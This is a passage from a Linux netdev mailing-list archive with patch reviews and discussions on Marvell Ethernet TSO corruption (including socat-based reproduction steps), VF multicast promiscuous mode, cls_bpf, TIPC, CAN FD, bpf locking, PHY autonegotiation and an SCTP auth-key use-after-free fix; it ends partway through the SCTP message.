> why everyone copy pasting such hgenerator instead of using idr...
I think we should abstract these bits into a helper function. ;)
Hmm, looking into git history tree, hgenerator came later than
idr, so I presume the overhead of idr was not worth it.
^ permalink raw reply
* Re: [PATCH net 0/2] net: marvell: Fix highmem support on non-TSO path
From: Dean Gehnert @ 2015-01-22 19:01 UTC (permalink / raw)
To: Ezequiel Garcia, Russell King - ARM Linux
Cc: netdev, David Miller, B38611, fabio.estevam
In-Reply-To: <54C14564.7060408@free-electrons.com>
On 01/22/2015 10:45 AM, Ezequiel Garcia wrote:
> On 01/22/2015 03:41 PM, Dean Gehnert wrote:
>> On 01/21/2015 07:01 AM, Russell King - ARM Linux wrote:
>>> On Wed, Jan 21, 2015 at 09:54:08AM -0300, Ezequiel Garcia wrote:
>>>> These two commits are fixes to the issue reported by Russell King on
>>>> mv643xx_eth. Namely, the introduction of a regression by commit
>>>> 69ad0dd7af22
>>>> which removed the support for highmem skb fragments. The guilty commit
>>>> introduced the assumption of fragment's payload being located in
>>>> lowmem pages.
>>> I do wonder whether 69ad0dd7af22 is the real culpret, or whether there is
>>> some other change in the netdev layer that we're missing. That commit is
>>> in 3.16, but from what I remember, 3.17 works fine, it's 3.18 which
>>> fails.
>>>
>>>> A similar pattern can be found in the original mvneta driver (in
>>>> fact, the
>>>> regression was introduced by copy-pasting the mvneta code).
>>>>
>>>> These fixes are for the non-TSO egress path in mvneta and mv643xx_eth
>>>> drivers.
>>>> The TSO path needs a more intrusive change, as the TSO API needs to
>>>> be fixed
>>>> (e.g. to make it work in skb fragments, instead of pointers to data).
>>>>
>>>> Russell, as I'm still unable to reproduce this, do you think you can
>>>> give it a spin over there?
>>> Sure - I think the only one I can test is mv643xx_eth, I don't think I
>>> have any device which supports mv_neta.
>>>
>>> The test scenario is for a NFS mount (the Marvell device as the NFS
>>> client) over IPv6.
>>>
>>> Initial testing looks good, I'll let it run for a while with various
>>> builds on the NFS share (which iirc was one of the triggering
>>> workloads).
>>>
>>> Thanks.
>>>
>> FYI, I found a way to reproduce the mv643xx_eth transmit corruption
>> without using a network filesystem by using SOCAT (should also be able
>> to use NETCAT or NC) and I have a bit more information about the
>> corruption that looks like it is somehow related to the cache line size.
>>
>> 1) Create a "large" input file with known data on the target (saved to
>> RAM disk or other storage):
>> % php -r 'for ($x = 0; $x < 0x2000000; $x++) { printf("%08X\n", $x);
>> }' > ExpectData.in
>> or
>> % perl -e 'for ($x = 0; $x < 0x2000000; $x++) { printf("%08X\n",
>> $x); }' > ExpectData.in
>> % md5sum ExpectData.in
>> 4a4727232209b85badc1ca25ed4df222 ExpectData.in
>> 2) Start SOCAT on the host system to perform Ethernet receive MD5
>> checksum of the data:
>> % socat -s -u TCP4-LISTEN:4000,fork,reuseaddr EXEC:md5sum
>> 3) Enable TSO on the target:
>> % ethtool -K eth0 tso on
>> 4) Send the data file from the target to the host using SOCAT with a
>> non-cache aligned block size:
>> % socat -b$(((1024*10)+1)) -u ExpectData.in TCP:192.168.1.212:4000
>> 5) The SOCAT running on the host system will report the MD5 checksum. If
>> the MD5 is correct, it should be 4a4727232209b85badc1ca25ed4df222.
>>
>> What I am seeing is every now and then, there are 32-bits (4 bytes) of
>> data in the transmit Ethernet stream that are corrupted. If I change the
>> SOCAT block size to something that is Armada 300 (Kirkwood) cache line
>> aligned (ie. -b$(((1024*10)+0)) or -b$(((1024*10)+8))), it works just
>> fine... If you want to capture the actual file and look at it, you can
>> use SOCAT:
>> % socat -u TCP4-LISTEN:4000,fork,reuseaddr OPEN:ActualData.in,creat
>> and since the data file is text, it is really easy to see the corruption
>> (diff ExpectData.in ActualData.in | less).
>>
>> I can disable TSO (ethtool -K eth0 tso off) and re-run the tests and the
>> corruption does not occur.
>>
>> I will give Ezequiel's latest patches a test a today and let you know if
>> they change the behavior.
>>
> Sigh, this smells like a completely different bug. Which kernel version
> are you testing?
This was tested on v3.16.7 with all the patches forward to tip of tree
on the mv643xx_eth driver. We are still not devtree enabled, so v3.16.7
is where we are stuck until I get the Armada XP and MV-EBU enabled.
BTW, I did check and I already have all the latest NetDev patches for
the driver and the problem still occurs...
It is almost feeling like a low-level DMA issue being the root cause...
A bit off topic for the NetDev discussion, but we have also seen some
odd behavior with the Firewire OHCI driver in respect to the Kirkwood
platform and DMA... Not sure if they are could be related problems or not.
^ permalink raw reply
* RE: [E1000-devel] [PATCH 1/2] if_link: Add VF multicast promiscuous mode control
From: Skidmore, Donald C @ 2015-01-22 19:00 UTC (permalink / raw)
To: David Laight, Hiroshi Shimamoto, Bjørn Mork
Cc: e1000-devel@lists.sourceforge.net, netdev@vger.kernel.org,
Choi, Sy Jong, linux-kernel@vger.kernel.org, Hayato Momma
In-Reply-To: <063D6719AE5E284EB5DD2968C1650D6D1CAD0C8A@AcuExch.aculab.com>
> -----Original Message-----
> From: David Laight [mailto:David.Laight@ACULAB.COM]
> Sent: Thursday, January 22, 2015 1:50 AM
> To: Skidmore, Donald C; Hiroshi Shimamoto; Bjørn Mork
> Cc: e1000-devel@lists.sourceforge.net; netdev@vger.kernel.org; Choi, Sy
> Jong; linux-kernel@vger.kernel.org; Hayato Momma
> Subject: RE: [E1000-devel] [PATCH 1/2] if_link: Add VF multicast promiscuous
> mode control
>
> From: Skidmore, Donald C
> > > > From: Hiroshi Shimamoto
> > > > > My concern is what is the real issue that VF multicast
> > > > > promiscuous mode
> > > can cause.
> > > > > I think there is the 4k entries to filter multicast address, and
> > > > > the current ixgbe/ixgbevf can turn all bits on from VM. That is
> > > > > almost same as
> > > enabling multicast promiscuous mode.
> > > > > I mean that we can receive all multicast addresses by an onerous
> > > operation in untrusted VM.
> > > > > I think we should clarify what is real security issue in this context.
> > > >
> > > > If you are worried about passing un-enabled multicasts to users
> > > > then what about doing a software hash of received multicasts and
> > > > checking against an actual list of multicasts enabled for that hash entry.
> > > > Under normal conditions there is likely to be only a single address to
> check.
> > > >
> > > > It may (or may not) be best to use the same hash as any hashing
> > > > hardware filter uses.
> > >
> > > thanks for the comment. But I don't think that is the point.
> > >
> > > I guess, introducing VF multicast promiscuous mode seems to add new
> > > privilege to peek every multicast packet in VM and that doesn't look
> good.
> > > On the other hand, I think that there has been the same privilege in
> > > the current ixgbe/ixgbevf implementation already. Or I'm reading the
> > > code wrongly.
> > > I'd like to clarify what is the issue of allowing to receive all multicast
> packets.
> >
> > Allowing a VM to give itself the privilege of seeing every multicast
> > packet could be seen as a hole in VM isolation.
> > Now if the host system allows this policy I don't see this as an issue
> > as someone specifically allowed this to happen and then must not be
> concerned.
> > We could even log that it has occurred, which I believe your patch did do.
> > The issue is also further muddied, as you mentioned above, since some
> > of these multicast packets are leaking anyway (the HW currently uses a 12
> bit mask).
> > It's just that this change would greatly enlarge that hole from a
> > fraction to all multicast packets.
>
> Why does it have anything to do with VM isolation?
> Isn't is just the same as if the VM were connected directly to the ethernet
> cable?
>
> David
I do see your point. :)
My hang up is more related to: without the nob to enable it (off by default) we are letting one VF dictate policy for all the other VFs and the PF. If one VF needs to be in promiscuous multicast so is everyone else. Their stacks now needs to deal with all the extra multicast packets. As you point out this might not be a direct concern for isolation in that the VM could have 'chosen' to join any Multicast group and seen this traffic. My concern over isolation is one VF has chosen that all the other VM now have to see this multicast traffic.
This will effect performance as these packets will need to be replicated. So once again my issue is a VF is making the policy decision that doing this is ok for the entire system. That should be the PF's job.
Does this give you a better idea where my concerns lay?
^ permalink raw reply
* Re: [PATCH net 2/2] net: cls_bpf: fix auto generation of per list handles
From: Alexei Starovoitov @ 2015-01-22 18:52 UTC (permalink / raw)
To: Daniel Borkmann
Cc: David S. Miller, Jiří Pírko,
netdev@vger.kernel.org
In-Reply-To: <1421919662-21066-3-git-send-email-dborkman@redhat.com>
On Thu, Jan 22, 2015 at 1:41 AM, Daniel Borkmann <dborkman@redhat.com> wrote:
> When creating a bpf classifier in tc with priority collisions and
> invoking automatic unique handle assignment, cls_bpf_grab_new_handle()
> will return a wrong handle id which in fact is non-unique. Usually
> altering of specific filters is being addressed over major id, but
> in case of collisions we result in a filter chain, where handle ids
> address individual cls_bpf_progs inside the classifier.
>
> Issue is, in cls_bpf_grab_new_handle() we probe for head->hgen handle
> in cls_bpf_get() and in case we found a free handle, we're supposed
> to use exactly head->hgen. In case of insufficient numbers of handles,
> we bail out later as handle id 0 is not allowed.
>
> Fixes: 7d1d65cb84e1 ("net: sched: cls_bpf: add BPF-based classifier")
> Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
> Acked-by: Jiri Pirko <jiri@resnulli.us>
Acked-by: Alexei Starovoitov <ast@plumgrid.com>
interesting bug. first time I'm looking at this bit and wondering
why everyone copy pasting such hgenerator instead of using idr...
^ permalink raw reply
* Re: [PATCH net 0/2] net: marvell: Fix highmem support on non-TSO path
From: Ezequiel Garcia @ 2015-01-22 18:45 UTC (permalink / raw)
To: deang, Russell King - ARM Linux
Cc: netdev, David Miller, B38611, fabio.estevam
In-Reply-To: <54C1443C.80909@tpi.com>
On 01/22/2015 03:41 PM, Dean Gehnert wrote:
> On 01/21/2015 07:01 AM, Russell King - ARM Linux wrote:
>> On Wed, Jan 21, 2015 at 09:54:08AM -0300, Ezequiel Garcia wrote:
>>> These two commits are fixes to the issue reported by Russell King on
>>> mv643xx_eth. Namely, the introduction of a regression by commit
>>> 69ad0dd7af22
>>> which removed the support for highmem skb fragments. The guilty commit
>>> introduced the assumption of fragment's payload being located in
>>> lowmem pages.
>> I do wonder whether 69ad0dd7af22 is the real culpret, or whether there is
>> some other change in the netdev layer that we're missing. That commit is
>> in 3.16, but from what I remember, 3.17 works fine, it's 3.18 which
>> fails.
>>
>>> A similar pattern can be found in the original mvneta driver (in
>>> fact, the
>>> regression was introduced by copy-pasting the mvneta code).
>>>
>>> These fixes are for the non-TSO egress path in mvneta and mv643xx_eth
>>> drivers.
>>> The TSO path needs a more intrusive change, as the TSO API needs to
>>> be fixed
>>> (e.g. to make it work in skb fragments, instead of pointers to data).
>>>
>>> Russell, as I'm still unable to reproduce this, do you think you can
>>> give it a spin over there?
>> Sure - I think the only one I can test is mv643xx_eth, I don't think I
>> have any device which supports mv_neta.
>>
>> The test scenario is for a NFS mount (the Marvell device as the NFS
>> client) over IPv6.
>>
>> Initial testing looks good, I'll let it run for a while with various
>> builds on the NFS share (which iirc was one of the triggering
>> workloads).
>>
>> Thanks.
>>
> FYI, I found a way to reproduce the mv643xx_eth transmit corruption
> without using a network filesystem by using SOCAT (should also be able
> to use NETCAT or NC) and I have a bit more information about the
> corruption that looks like it is somehow related to the cache line size.
>
> 1) Create a "large" input file with known data on the target (saved to
> RAM disk or other storage):
> % php -r 'for ($x = 0; $x < 0x2000000; $x++) { printf("%08X\n", $x);
> }' > ExpectData.in
> or
> % perl -e 'for ($x = 0; $x < 0x2000000; $x++) { printf("%08X\n",
> $x); }' > ExpectData.in
> % md5sum ExpectData.in
> 4a4727232209b85badc1ca25ed4df222 ExpectData.in
> 2) Start SOCAT on the host system to perform Ethernet receive MD5
> checksum of the data:
> % socat -s -u TCP4-LISTEN:4000,fork,reuseaddr EXEC:md5sum
> 3) Enable TSO on the target:
> % ethtool -K eth0 tso on
> 4) Send the data file from the target to the host using SOCAT with a
> non-cache aligned block size:
> % socat -b$(((1024*10)+1)) -u ExpectData.in TCP:192.168.1.212:4000
> 5) The SOCAT running on the host system will report the MD5 checksum. If
> the MD5 is correct, it should be 4a4727232209b85badc1ca25ed4df222.
>
> What I am seeing is every now and then, there are 32-bits (4 bytes) of
> data in the transmit Ethernet stream that are corrupted. If I change the
> SOCAT block size to something that is Armada 300 (Kirkwood) cache line
> aligned (ie. -b$(((1024*10)+0)) or -b$(((1024*10)+8))), it works just
> fine... If you want to capture the actual file and look at it, you can
> use SOCAT:
> % socat -u TCP4-LISTEN:4000,fork,reuseaddr OPEN:ActualData.in,creat
> and since the data file is text, it is really easy to see the corruption
> (diff ExpectData.in ActualData.in | less).
>
> I can disable TSO (ethtool -K eth0 tso off) and re-run the tests and the
> corruption does not occur.
>
> I will give Ezequiel's latest patches a test a today and let you know if
> they change the behavior.
>
Sigh, this smells like a completely different bug. Which kernel version
are you testing?
--
Ezequiel García, Free Electrons
Embedded Linux, Kernel and Android Engineering
http://free-electrons.com
^ permalink raw reply
* RE: [PATCH net-next 2/2] flow_dissector: add tipc support
From: Jon Maloy @ 2015-01-22 18:38 UTC (permalink / raw)
To: Eric Dumazet, Erik Hugne
Cc: Richard Alpe, netdev@vger.kernel.org, ying.xue@windriver.com,
tipc-discussion@lists.sourceforge.net
In-Reply-To: <1421947751.3471.12.camel@edumazet-glaptop2.roam.corp.google.com>
> -----Original Message-----
> From: Eric Dumazet [mailto:eric.dumazet@gmail.com]
> Sent: January-22-15 12:29 PM
> To: Erik Hugne
> Cc: Richard Alpe; netdev@vger.kernel.org; Jon Maloy;
> ying.xue@windriver.com; tipc-discussion@lists.sourceforge.net
> Subject: Re: [PATCH net-next 2/2] flow_dissector: add tipc support
>
> On Thu, 2015-01-22 at 17:10 +0100, erik.hugne@ericsson.com wrote:
> > From: Erik Hugne <erik.hugne@ericsson.com>
> >
> > The flows are hashed on the sending node address, which allows us to
> > spread out the TIPC link processing to RPS enabled cores. There is no
> > point to include the destination address in the hash as that will
> > always be the same for all inbound links. We have experimented with a
> > 3-tuple hash over [srcnode, sport, dport], but this showed to give
> > slightly lower performance because of increased lock contention when
> > the same link was handled by multiple cores.
> >
> > Signed-off-by: Ying Xue <ying.xue@windriver.com>
> > Signed-off-by: Erik Hugne <erik.hugne@ericsson.com>
> > Reviewed-by: Jon Maloy <jon.maloy@ericsson.com>
> > ---
> > net/core/flow_dissector.c | 14 ++++++++++++++
> > 1 file changed, 14 insertions(+)
> >
> > diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c
> > index 4508493..beb83d1 100644
> > --- a/net/core/flow_dissector.c
> > +++ b/net/core/flow_dissector.c
> > @@ -178,6 +178,20 @@ ipv6:
> > return false;
> > }
> > }
> > + case htons(ETH_P_TIPC): {
> > + struct {
> > + __be32 pre[3];
> > + __be32 srcnode;
> > + } *hdr, _hdr;
>
> Is this header defined somewhere in an include file ?
>
> This looks a bit ugly to locally define the format...
The header is defined in a file (msg.h) inside the TIPC
module code, and cannot be included from here. It is
also a lot more detailed, and comes with a number of
inline functions to manipulate the header. The point
with doing it this way is that we don't want to expose
this header file outside the module code, when it isn't
strictly necessary.
Defining it locally is also a way of making it clear that the
content of word 3 of the header is the only thing that
matters in this context, and that we want to keep the
rest private.
Regards
///jon
>
>
^ permalink raw reply
* [PATCH] iproute2: can: Add support for CAN FD non-ISO feature
From: Oliver Hartkopp @ 2015-01-22 18:04 UTC (permalink / raw)
To: shemming, netdev; +Cc: Oliver Hartkopp
This patch makes CAN_CTRLMODE_FD_NON_ISO netlink feature configurable.
During the CAN FD standardization process within the ISO it turned out that
the failure detection capability has to be improved.
The CAN in Automation organization (CiA) defined the already implemented CAN
FD controllers as 'non-ISO' and the upcoming improved CAN FD controllers as
'ISO' compliant. See at http://www.can-cia.com/index.php?id=1937
Starting with the - currently non-ISO - driver for M_CAN v3.0.1 introduced in
Linux 3.18 this bit needs to be propagated to userspace. In future drivers this
bit will become configurable depending on the CAN FD controllers capabilities.
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
---
include/linux/can/netlink.h | 1 +
ip/iplink_can.c | 6 ++++++
2 files changed, 7 insertions(+)
diff --git a/include/linux/can/netlink.h b/include/linux/can/netlink.h
index 25fd52c..6d4ec2a 100644
--- a/include/linux/can/netlink.h
+++ b/include/linux/can/netlink.h
@@ -98,6 +98,7 @@ struct can_ctrlmode {
#define CAN_CTRLMODE_BERR_REPORTING 0x10 /* Bus-error reporting */
#define CAN_CTRLMODE_FD 0x20 /* CAN FD mode */
#define CAN_CTRLMODE_PRESUME_ACK 0x40 /* Ignore missing CAN ACKs */
+#define CAN_CTRLMODE_FD_NON_ISO 0x80 /* CAN FD in non-ISO mode */
/*
* CAN device statistics
diff --git a/ip/iplink_can.c b/ip/iplink_can.c
index fb50332..f1b089d 100644
--- a/ip/iplink_can.c
+++ b/ip/iplink_can.c
@@ -37,6 +37,7 @@ static void print_usage(FILE *f)
"\t[ one-shot { on | off } ]\n"
"\t[ berr-reporting { on | off } ]\n"
"\t[ fd { on | off } ]\n"
+ "\t[ fd-non-iso { on | off } ]\n"
"\t[ presume-ack { on | off } ]\n"
"\n"
"\t[ restart-ms TIME-MS ]\n"
@@ -100,6 +101,7 @@ static void print_ctrlmode(FILE *f, __u32 cm)
_PF(CAN_CTRLMODE_ONE_SHOT, "ONE-SHOT");
_PF(CAN_CTRLMODE_BERR_REPORTING, "BERR-REPORTING");
_PF(CAN_CTRLMODE_FD, "FD");
+ _PF(CAN_CTRLMODE_FD_NON_ISO, "FD-NON-ISO");
_PF(CAN_CTRLMODE_PRESUME_ACK, "PRESUME-ACK");
#undef _PF
if (cm)
@@ -203,6 +205,10 @@ static int can_parse_opt(struct link_util *lu, int argc, char **argv,
NEXT_ARG();
set_ctrlmode("fd", *argv, &cm,
CAN_CTRLMODE_FD);
+ } else if (matches(*argv, "fd-non-iso") == 0) {
+ NEXT_ARG();
+ set_ctrlmode("fd-non-iso", *argv, &cm,
+ CAN_CTRLMODE_FD_NON_ISO);
} else if (matches(*argv, "presume-ack") == 0) {
NEXT_ARG();
set_ctrlmode("presume-ack", *argv, &cm,
--
2.1.4
^ permalink raw reply related
* Re: [PATCH] bpf: Call rcu_read_unlock() before copy_to_user()
From: Alexei Starovoitov @ 2015-01-22 18:03 UTC (permalink / raw)
To: Michael Holzheu
Cc: Alexei Starovoitov, Martin Schwidefsky,
linux-kernel@vger.kernel.org, netdev@vger.kernel.org
On Thu, Jan 22, 2015 at 9:54 AM, Michael Holzheu
<holzheu@linux.vnet.ibm.com> wrote:
>> > So call rcu_read_unlock() before copy_to_user(). We can
>> > release the lock earlier because it is not needed for copy_to_user().
>>
>> we cannot move the rcu unlock this way, since it protects the value.
>> So we need to copy the value while still under rcu.
>
> Ok, right. I assume you will provide the correct fix.
sure :) will do.
^ permalink raw reply
* Re: [PATCH net 4/4] sh_eth: Fix serialisation of interrupt disable with interrupt & NAPI handlers
From: Ben Hutchings @ 2015-01-22 17:59 UTC (permalink / raw)
To: Sergei Shtylyov
Cc: David S.Miller, netdev, linux-kernel, Nobuhiro Iwamatsu,
Mitsuhiro Kimura, Hisashi Nakamura, Yoshihiro Kaneko
In-Reply-To: <54C126BA.4030807@cogentembedded.com>
On Thu, 2015-01-22 at 19:35 +0300, Sergei Shtylyov wrote:
> Hello.
>
> On 01/22/2015 06:06 PM, Ben Hutchings wrote:
>
> >>> In order to stop the RX path accessing the RX ring while it's being
> >>> stopped or resized, we clear the interrupt mask (EESIPR) and then call
> >>> free_irq() or synchronise_irq(). This is insufficient because the
> >>> interrupt handler or NAPI poller may set EESIPR again after we clear
> >>> it.
>
> >> Hm, how come the interrupt handler gets called when we have disabled all
> >> interrupts?
>
> > It may be running on another processor and racing with the function that
> > clears EESIPR.
>
> Ah, I didn't think about SMP... but then we need more spinlock protection
> instead, no?
That's what I tried first. As we need to serialise with NAPI as well,
and napi_disable() may sleep, we need to call that first, so I ended up
with:
napi_disable(&mdp->napi);
spin_lock_irq(&mdp->lock);
sh_eth_write(ndev, 0x0000, EESIPR);
spin_unlock_irq(&mdp->lock);
napi_enable(&mdp->napi);
But after napi_disable() sets the NAPI_STATE_DISABLE bit,
napi_schedule_prep() will return false and so the interrupt handler will
not clear the EESR_RX_CHECK bit any more. This can leave the interrupt
screaming and prevent the NAPI handler from ever completing, so the
system is livelocked.
> >> Is it unmaskable EESR.ECI interrupt? BTW, I'm not seeing where the
> >> interrupt handler enables interrupts again; only NAPI poller does that AFAIK.
>
> > Normally it only clears EESR_RX_CHECK, but as it cannot atomically clear
> > a single bit of EESIPR this can result in setting other bits.
>
> This is again only possible on SMP kernel, right?
Yes.
Ben.
^ permalink raw reply
* Re: [net-next PATCH v3 00/12] Flow API
From: Thomas Graf @ 2015-01-22 17:58 UTC (permalink / raw)
To: Jiri Pirko
Cc: Jamal Hadi Salim, Pablo Neira Ayuso, John Fastabend, simon.horman,
sfeldma, netdev, davem, gerlitz.or, andy, ast
In-Reply-To: <20150122154840.GC1863@nanopsycho.orion>
On 01/22/15 at 04:48pm, Jiri Pirko wrote:
> Thu, Jan 22, 2015 at 04:37:27PM CET, tgraf@suug.ch wrote:
> >On 01/22/15 at 10:28am, Jamal Hadi Salim wrote:
> >> On 01/22/15 10:13, Thomas Graf wrote:
> >>
> >> >I don't follow this. John's proposal allows to decide on a case by
> >> >case basis what we want to export. Just like with ethtool or
> >> >RTNETLINK. There is no direct access to hardware. A user can only
> >> >configure what is being exposed by the kernel.
> >> >
> >>
> >> So if i am a vendor with my own driver, I can expose whatever i want.
> >
> >No. We will reject any driver change attempting to do so on this
> >list.
>
> That is not 100%, on contrary. If the infrastructure would be made to
> explicitly disallow that kind of behaviour, it would be much safer.
I'm very much in favour of that. Ideas?
^ permalink raw reply
* [PATCH] net: phy: fix phy device autoneg wrong value
From: Nicolae Rosia @ 2015-01-22 17:56 UTC (permalink / raw)
To: netdev@vger.kernel.org, linux-kernel@vger.kernel.org,
f.fainelli@gmail.com
In phy_device_create, autoneg is set to AUTONEG_ENABLE.
When using the generic phy driver (phy_device.c),
genphy_config_init reads BMSR and finds out if autonegotiation
is possible and sets the phy device features accordingly.
phy_sanitize_settings is supposed to set the right value of
autoneg, but it is never called if autonegotiation is enabled,
which is always the case.
Signed-off-by: Nicolae Rosia <nicolae.rosia@certsign.ro>
---
drivers/net/phy/phy.c | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/drivers/net/phy/phy.c b/drivers/net/phy/phy.c
index 767cd11..9c35136 100644
--- a/drivers/net/phy/phy.c
+++ b/drivers/net/phy/phy.c
@@ -249,9 +249,6 @@ static void phy_sanitize_settings(struct phy_device
*phydev)
unsigned int idx;
/* Sanitize settings based on PHY capabilities */
- if ((features & SUPPORTED_Autoneg) == 0)
- phydev->autoneg = AUTONEG_DISABLE;
-
idx = phy_find_valid(phy_find_setting(phydev->speed, phydev->duplex),
features);
@@ -436,6 +433,9 @@ int phy_start_aneg(struct phy_device *phydev)
mutex_lock(&phydev->lock);
+ if ((phydev->supported & SUPPORTED_Autoneg) == 0)
+ phydev->autoneg = AUTONEG_DISABLE;
+
if (AUTONEG_DISABLE == phydev->autoneg)
phy_sanitize_settings(phydev);
--
2.1.0
^ permalink raw reply related
* Re: [PATCH] bpf: Call rcu_read_unlock() before copy_to_user()
From: Michael Holzheu @ 2015-01-22 17:54 UTC (permalink / raw)
To: Alexei Starovoitov
Cc: Alexei Starovoitov, Martin Schwidefsky,
linux-kernel@vger.kernel.org, netdev@vger.kernel.org
In-Reply-To: <CAADnVQLnrAgk3vTppugqCtSsHL4XiZeQJrQi3cqhgLCCq1v8Pg@mail.gmail.com>
On Thu, 22 Jan 2015 09:27:21 -0800
Alexei Starovoitov <alexei.starovoitov@gmail.com> wrote:
> On Thu, Jan 22, 2015 at 7:57 AM, Michael Holzheu
> <holzheu@linux.vnet.ibm.com> wrote:
> > We must not hold locks when calling copy_to_user():
> >
> > BUG: sleeping function called from invalid context at mm/memory.c:3732
> > in_atomic(): 0, irqs_disabled(): 0, pid: 671, name: test_maps
> > 1 lock held by test_maps/671:
> > #0: (rcu_read_lock){......}, at: [<0000000000264190>] map_lookup_elem+0xe8/0x260
> > Preemption disabled at:[<00000000001be3b6>] vprintk_default+0x56/0x68
> >
> > CPU: 0 PID: 671 Comm: test_maps Not tainted 3.19.0-rc5-00117-g5eb11d6-dirty #424
> > 000000001e447bb0 000000001e447c40 0000000000000002 0000000000000000
> > 000000001e447ce0 000000001e447c58 000000001e447c58 0000000000115c8a
> > 0000000000000000 0000000000c08246 0000000000c27e8a 000000000000000b
> > 000000001e447ca0 000000001e447c40 0000000000000000 0000000000000000
> > 0000000000000000 0000000000115c8a 000000001e447c40 000000001e447ca0
> > Call Trace:
> > ([<0000000000115b7e>] show_trace+0x12e/0x150)
> > [<0000000000115c40>] show_stack+0xa0/0x100
> > [<00000000009b163c>] dump_stack+0x74/0xc8
> > [<000000000017424a>] ___might_sleep+0x23a/0x248
> > [<00000000002b58e8>] might_fault+0x70/0xe8
> > [<0000000000264230>] map_lookup_elem+0x188/0x260
> > [<0000000000264716>] SyS_bpf+0x20e/0x840
> > [<00000000009bbe3a>] system_call+0xd6/0x24c
> > [<000003fffd15f566>] 0x3fffd15f566
> > 1 lock held by test_maps/671:
> > #0: (rcu_read_lock){......}, at: [<0000000000264190>] map_lookup_elem+0xe8/0x260
> >
> > So call rcu_read_unlock() before copy_to_user(). We can
> > release the lock earlier because it is not needed for copy_to_user().
>
> we cannot move the rcu unlock this way, since it protects the value.
> So we need to copy the value while still under rcu.
Ok, right. I assume you will provide the correct fix.
> I'm puzzled how I missed this warning.
> I guess you have CONFIG_PREEMPT_RCU=y ?
Yes.
Regards,
Michael
^ permalink raw reply
* Re: [PATCH net] net: sctp: fix slab corruption from use after free on INIT collisions
From: Vlad Yasevich @ 2015-01-22 17:52 UTC (permalink / raw)
To: Daniel Borkmann, davem; +Cc: netdev, linux-sctp
In-Reply-To: <1421947614-31407-1-git-send-email-dborkman@redhat.com>
On 01/22/2015 12:26 PM, Daniel Borkmann wrote:
> When hitting an INIT collision case during the 4WHS with AUTH enabled, as
> already described in detail in commit 1be9a950c646 ("net: sctp: inherit
> auth_capable on INIT collisions"), it can happen that we occasionally
> still remotely trigger the following panic on server side which seems to
> have been uncovered after the fix from commit 1be9a950c646 ...
>
> [ 533.876389] BUG: unable to handle kernel paging request at 00000000ffffffff
> [ 533.913657] IP: [<ffffffff811ac385>] __kmalloc+0x95/0x230
> [ 533.940559] PGD 5030f2067 PUD 0
> [ 533.957104] Oops: 0000 [#1] SMP
> [ 533.974283] Modules linked in: sctp mlx4_en [...]
> [ 534.939704] Call Trace:
> [ 534.951833] [<ffffffff81294e30>] ? crypto_init_shash_ops+0x60/0xf0
> [ 534.984213] [<ffffffff81294e30>] crypto_init_shash_ops+0x60/0xf0
> [ 535.015025] [<ffffffff8128c8ed>] __crypto_alloc_tfm+0x6d/0x170
> [ 535.045661] [<ffffffff8128d12c>] crypto_alloc_base+0x4c/0xb0
> [ 535.074593] [<ffffffff8160bd42>] ? _raw_spin_lock_bh+0x12/0x50
> [ 535.105239] [<ffffffffa0418c11>] sctp_inet_listen+0x161/0x1e0 [sctp]
> [ 535.138606] [<ffffffff814e43bd>] SyS_listen+0x9d/0xb0
> [ 535.166848] [<ffffffff816149a9>] system_call_fastpath+0x16/0x1b
>
> ... or depending on the the application, for example this one:
>
> [ 1370.026490] BUG: unable to handle kernel paging request at 00000000ffffffff
> [ 1370.026506] IP: [<ffffffff811ab455>] kmem_cache_alloc+0x75/0x1d0
> [ 1370.054568] PGD 633c94067 PUD 0
> [ 1370.070446] Oops: 0000 [#1] SMP
> [ 1370.085010] Modules linked in: sctp kvm_amd kvm [...]
> [ 1370.963431] Call Trace:
> [ 1370.974632] [<ffffffff8120f7cf>] ? SyS_epoll_ctl+0x53f/0x960
> [ 1371.000863] [<ffffffff8120f7cf>] SyS_epoll_ctl+0x53f/0x960
> [ 1371.027154] [<ffffffff812100d3>] ? anon_inode_getfile+0xd3/0x170
> [ 1371.054679] [<ffffffff811e3d67>] ? __alloc_fd+0xa7/0x130
> [ 1371.080183] [<ffffffff816149a9>] system_call_fastpath+0x16/0x1b
>
> With slab debugging enabled, we can see that the poison has been overwritten:
>
> [ 669.826368] BUG kmalloc-128 (Tainted: G W ): Poison overwritten
> [ 669.826385] INFO: 0xffff880228b32e50-0xffff880228b32e50. First byte 0x6a instead of 0x6b
> [ 669.826414] INFO: Allocated in sctp_auth_create_key+0x23/0x50 [sctp] age=3 cpu=0 pid=18494
> [ 669.826424] __slab_alloc+0x4bf/0x566
> [ 669.826433] __kmalloc+0x280/0x310
> [ 669.826453] sctp_auth_create_key+0x23/0x50 [sctp]
> [ 669.826471] sctp_auth_asoc_create_secret+0xcb/0x1e0 [sctp]
> [ 669.826488] sctp_auth_asoc_init_active_key+0x68/0xa0 [sctp]
> [ 669.826505] sctp_do_sm+0x29d/0x17c0 [sctp] [...]
> [ 669.826629] INFO: Freed in kzfree+0x31/0x40 age=1 cpu=0 pid=18494
> [ 669.826635] __slab_free+0x39/0x2a8
> [ 669.826643] kfree+0x1d6/0x230
> [ 669.826650] kzfree+0x31/0x40
> [ 669.826666] sctp_auth_key_put+0x19/0x20 [sctp]
> [ 669.826681] sctp_assoc_update+0x1ee/0x2d0 [sctp]
> [ 669.826695] sctp_do_sm+0x674/0x17c0 [sctp]
>
> Since this only triggers in some collision-cases with AUTH, the problem at
> heart is that sctp_auth_key_put() on asoc->asoc_shared_key is called twice
> when having refcnt 1, once directly in sctp_assoc_update() and yet again
> from within sctp_auth_asoc_init_active_key() via sctp_assoc_update() on
> the already kzfree'd memory, which is also consistent with the observation
> of the poison decrease from 0x6b to 0x6a (note: the overwrite is detected
> at a later point in time when poison is checked on new allocation).
>
> Reference counting of auth keys revisited:
>
> Shared keys for AUTH chunks are being stored in endpoints and associations
> in endpoint_shared_keys list. On endpoint creation, a null key is being
> added; on association creation, all endpoint shared keys are being cached
> and thus cloned over to the association. struct sctp_shared_key only holds
> a pointer to the actual key bytes, that is, struct sctp_auth_bytes which
> keeps track of users internally through refcounting. Naturally, on assoc
> or enpoint destruction, sctp_shared_key are being destroyed directly and
> the reference on sctp_auth_bytes dropped.
>
> User space can add keys to either list via setsockopt(2) through struct
> sctp_authkey and by passing that to sctp_auth_set_key() which replaces or
> adds a new auth key. There, sctp_auth_create_key() creates a new sctp_auth_bytes
